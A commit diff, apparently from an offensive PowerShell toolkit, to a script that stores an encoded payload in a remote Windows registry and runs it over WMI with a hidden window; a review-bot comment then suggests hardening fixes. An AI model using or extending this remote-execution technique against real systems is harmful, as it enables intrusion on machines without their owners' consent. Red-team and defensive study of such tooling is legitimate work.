
Commit f6e032c

author
Matt Graeber
committed
Invoke-WmiCommand now obtains full powershell path
Addresses issue PowerShellMafia#95.
1 parent 924103a commit f6e032c


1 file changed

+16
-2
lines changed


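--- a/CodeExecution/Invoke-WmiCommand.ps1
+++ b/CodeExecution/Invoke-WmiCommand.ps1
@@ -209,6 +209,8 @@ the output of your payload back. :P
 'HKEY_CURRENT_CONFIG' { $Hive = 2147483653 }
 }
 
+$HKEY_LOCAL_MACHINE = 2147483650
+
 $WmiMethodArgs = @{}
 
 # If additional WMI cmdlet properties were provided, proxy them to Invoke-WmiMethod
@@ -253,6 +255,18 @@ the output of your payload back. :P
 throw "[$Computer] You do not have permission to perform all the registry operations necessary for Invoke-WmiCommand."
 }
 
+$PSSettingsPath = 'SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell'
+$PSPathValueName = 'Path'
+
+$Result = Invoke-WmiMethod @WmiMethodArgs -Namespace 'Root\default' -Class 'StdRegProv' -Name 'GetStringValue' -ArgumentList $HKEY_LOCAL_MACHINE, $PSSettingsPath, $PSPathValueName
+
+if ($Result.ReturnValue -ne 0) {
+throw "[$Computer] Unable to obtain powershell.exe path from the following registry value: HKEY_LOCAL_MACHINE\$PSSettingsPath\$PSPathValueName"
+}
+
+$PowerShellPath = $Result.sValue
+Write-Verbose "Full PowerShell path: $PowerShellPath"
+
 $EncodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Payload))
 
 Write-Verbose "[$Computer] Storing the payload into the following registry value: $RegistryHive\$RegistryKeyPath\$RegistryPayloadValueName"
@@ -293,15 +307,15 @@ the output of your payload back. :P
 
 $Base64Payload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($RemotePayloadRunner))
 
-$Cmdline = "powershell -WindowStyle Hidden -NoProfile -EncodedCommand $Base64Payload"
+$Cmdline = "$PowerShellPath -WindowStyle Hidden -NoProfile -EncodedCommand $Base64Payload"
 
 # Execute the payload runner on the remote system
 $Result = Invoke-WmiMethod @WmiMethodArgs -Namespace 'Root\cimv2' -Class 'Win32_Process' -Name 'Create' -ArgumentList $Cmdline
 
 Start-Sleep -Seconds 5
 
 if ($Result.ReturnValue -ne 0) {
-throw "[$Computer] Unable execute payload stored within the following registry value: $RegistryHive\$RegistryKeyPath\$RegistryPayloadValueName"
+throw "[$Computer] Unable to execute payload stored within the following registry value: $RegistryHive\$RegistryKeyPath\$RegistryPayloadValueName"
 }
 
 Write-Verbose "[$Computer] Payload successfully executed from: $RegistryHive\$RegistryKeyPath\$RegistryPayloadValueName"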
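Review bot: `$PowerShellPath = $Result.sValue` on new line 267 is used without checking that a value actually came back, so a GetStringValue call that returns 0 with an empty sValue would build a `$Cmdline` that starts with a space and only fail later, at Win32_Process Create, with an error message that points at the payload registry value rather than the real cause; add `if ([string]::IsNullOrEmpty($PowerShellPath)) { throw "[$Computer] powershell.exe path read from HKEY_LOCAL_MACHINE\$PSSettingsPath\$PSPathValueName is empty" }` before it is used. The path is also interpolated unquoted into `$Cmdline` on new line 310, so a registry value containing spaces would be split by the command-line parser; wrap `$PowerShellPath` in escaped double quotes when composing `$Cmdline`. The new Write-Verbose on line 268 omits the `[$Computer]` prefix that every other verbose message in this section carries; `Write-Verbose "[$Computer] Full PowerShell path: $PowerShellPath"` keeps the output consistent. The enclosing function body starts and ends outside these hunks.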
